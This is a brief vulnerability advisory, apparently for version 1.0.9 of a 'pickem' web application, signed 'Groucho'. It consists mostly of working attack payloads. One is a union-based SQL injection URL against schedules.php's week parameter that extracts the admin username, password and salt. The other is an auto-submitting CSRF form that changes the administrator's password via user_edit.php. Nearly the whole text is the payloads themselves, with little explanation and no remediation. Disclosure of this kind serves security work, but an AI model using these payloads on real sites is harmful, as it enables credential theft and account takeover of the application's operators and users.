# Version: 1.0.9
# Dork: Not yet
SQL Injection
=============
---------------[schedules.php]---------------
---------------[schedules.php]---------------
Therefore we can easily inject in the week get parameter.
PoC: http://pentest.lan/pickem/schedules.php?week=-3%20union%20select%201,%28SELECT%20concat%28username,%200x3a,%20password,%200x3a,%20salt%29%20FROM%20nflp_users%20LIMIT%201%29,3,4,5,6,7,8,9,10,11,12,13,14--%20-
(Union-based simple injection to get admin username and pass+salt)
Cross site request forgery
==========================
<body onload='document.forms[0].submit()'>
<form method='post' action='http://pentest.lan/pickem/user_edit.php'>
<input type='hidden' name='firstname' value='Admin'>
<input type='hidden' name='lastname' value='Admin'>
<input type='hidden' name='email' value='admin%40yourdomain.com'>
<input type='hidden' name='password' value='aaaaaa'>
<input type='hidden' name='password2' value='aaaaaa'>
<input type='hidden' name='submit' value='Submit'>
</form>
</body>
Groucho